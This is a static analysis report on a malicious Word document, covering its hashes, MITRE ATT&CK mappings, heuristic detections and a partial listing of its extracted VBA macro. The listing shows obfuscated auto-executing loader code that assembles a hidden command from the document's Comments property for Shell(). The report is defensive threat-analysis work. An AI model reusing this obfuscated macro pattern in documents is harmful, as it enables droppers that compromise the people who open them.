Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c3fff626f931fff…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 77.0 KB
Created: 2017-10-12 13:49:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: 4147656d10dd24d2f531dfd9c1409103
SHA-1: 8cf69e901c06a4699754910e931a72ce5e7b7455
SHA-256: 5c3fff626f931fff80d79e53fdbf41a591f8dc048df2c7b636aa2d7a388d8e63
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, which fires a critical heuristic (OLE_VBA_SHELL) and indicates an attempt to execute arbitrary commands. This is further supported by the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic, which flags auto-executing macros whose compiled p-code contains execution tokens. The ClamAV detection Doc.Macro.DollarShell-6346616-0 also confirms its malicious nature. The macro's obfuscation and its reliance on Shell() strongly suggest it is designed to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6535 bytes
SHA-256: 73364453be2650949abcbd785f91e65cf5f9581b93f3024e0e085b5a68f29e06

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub wkARWtXtE()
WMibYioGF = "" + ASXzJq + XAvcw + bNFNMPdj + SdziRBw + "coMments" + ASXzJq + XAvcw + bNFNMPdj + SdziRBw + DazZTYn + XwSCAobS + qjbwXXAn + ztzfZI + nLjpQimT
wkUiKYb = Mid((jWFQJPvPS(WMibYioGF)), 13218, 105)
uOSilBQF = Right(Left((jWFQJPvPS(WMibYioGF)), 16666), 89)
lCVzSmkz = Mid((jWFQJPvPS(WMibYioGF)), 3920, 29)
LtIpVjkc = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 14700), 61)
TkPAIG = Mid((jWFQJPvPS(WMibYioGF)), 745, 84)
DITLOKQPc = Mid((jWFQJPvPS(WMibYioGF)), 8722, 37)
waYRW = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 7165), 155)
FcNEQ = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 3086), 198)
rEAmV = Right(Left((jWFQJPvPS(WMibYioGF)), 6059), 2)
jzwBHz = Mid((jWFQJPvPS(WMibYioGF)), 5285, 185)
ZGDzaImuStm = Right(Left((jWFQJPvPS(WMibYioGF)), 17921), 119)
aXwrf = Mid((jWFQJPvPS(WMibYioGF)), 832, 156)
FPcHzqMa = Mid((jWFQJPvPS(WMibYioGF)), 11883, 188)
ONWGCHA = Mid((jWFQJPvPS(WMibYioGF)), 1510, 181)
sEKiti = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 1035), 116)
IcwJbo = Right(Left((jWFQJPvPS(WMibYioGF)), 11698), 94)
KdwAjvMSCiY = Mid((jWFQJPvPS(WMibYioGF)), 12307, 167)
XQzYSSRvjjZ = Right(Left((jWFQJPvPS(WMibYioGF)), 8604), 25)
DzdGnZOMs = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 13108), 36)
Sdwsr = Mid((jWFQJPvPS(WMibYioGF)), 11212, 128)
JwNlMAl = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 13349), 128)
qwduWmC = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 5572), 93)
ovrzVi = Right(Left((jWFQJPvPS(WMibYioGF)), 15820), 33)
sFoVYDAUQP = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 10441), 60)
lcViEYO = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 6322), 29)
ijbFiClXK = Mid((jWFQJPvPS(WMibYioGF)), 15300, 139)
GaIfUzRvc = Mid((jWFQJPvPS(WMibYioGF)), 1211, 97)
WiYdM = Right(Left((jWFQJPvPS(WMibYioGF)), 17218), 51)
vzUPDK = Mid((jWFQJPvPS(WMibYioGF)), 5108, 91)
QuAPwG = Mid((jWFQJPvPS(WMibYioGF)), 7800, 112)
MLUqJEGTmJ = Mid((jWFQJPvPS(WMibYioGF)), 3331, 64)
tjAqLK = Right(Left((jWFQJPvPS(WMibYioGF)), 11424), 36)
KqWzFIjWu = Mid((jWFQJPvPS(WMibYioGF)), 1704, 74)
zktMSriD = Right(Left((jWFQJPvPS(WMibYioGF)), 5068), 186)
BdtiPSjuJE = Right(Left((jWFQJPvPS(WMibYioGF)), 8111), 101)
HdVoWkBUjY = Right(Left((jWFQJPvPS(WMibYioGF)), 2599), 32)
cZAThzcGY = Mid((jWFQJPvPS(WMibYioGF)), 18373, 78)
MdPppA = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 15146), 54)
JrIdPriUw = Mid((jWFQJPvPS(WMibYioGF)), 19737, 163)
HcENGqSP = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 15574), 110)
bfSSUI = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 7033), 77)
vLUHn = Mid((jWFQJPvPS(WMibYioGF)), 2171, 146)
TwkcDiiDCh = Right(Left((jWFQJPvPS(WMibYioGF)), 4246), 51)
PJzWkP = Right(Left((jWFQJPvPS(WMibYioGF)), 14531), 171)
MpKviTNCr = Mid((jWFQJPvPS(WMibYioGF)), 18059, 199)
onZmtimJjwb = Right(Left((jWFQJPvPS(WMibYioGF)), 4181), 146)
mzvzvojsNi = Mid((jWFQJPvPS(WMibYioGF)), 2768, 157)
moujQbMzi = Right(Left((jWFQJPvPS(WMibYioGF)), 16245), 79)
pXFozFt = Mid((jWFQJPvPS(WMibYioGF)), 9077, 26)
YYIiYQHCS = Mid((jWFQJPvPS(WMibYioGF)), 10777, 145)
QCjTHGFDuN = wkUiKYb + uOSilBQF + lCVzSmkz + LtIpVjkc + TkPAIG + DITLOKQPc + waYRW + FcNEQ + rEAmV + jzwBHz + ZGDzaImuStm + aXwrf + FPcHzqMa + ONWGCHA + sEKiti + IcwJbo + KdwAjvMSCiY + XQzYSSRvjjZ + DzdGnZOMs + Sdwsr + JwNlMAl + qwduWmC + ovrzVi + sFoVYDAUQP + lcViEYO + ijbFiClXK + GaIfUzRvc + WiYdM + vzUPDK + QuAPwG + MLUqJEGTmJ + tjAqLK + KqWzFIjWu + zktMSriD + BdtiPSjuJE + HdVoWkBUjY + cZAThzcGY + MdPppA + JrIdPriUw + HcENGqSP + bfSSUI + vLUHn + TwkcDiiDCh + PJzWkP + MpKviTNCr + onZmtimJjwb
... (truncated)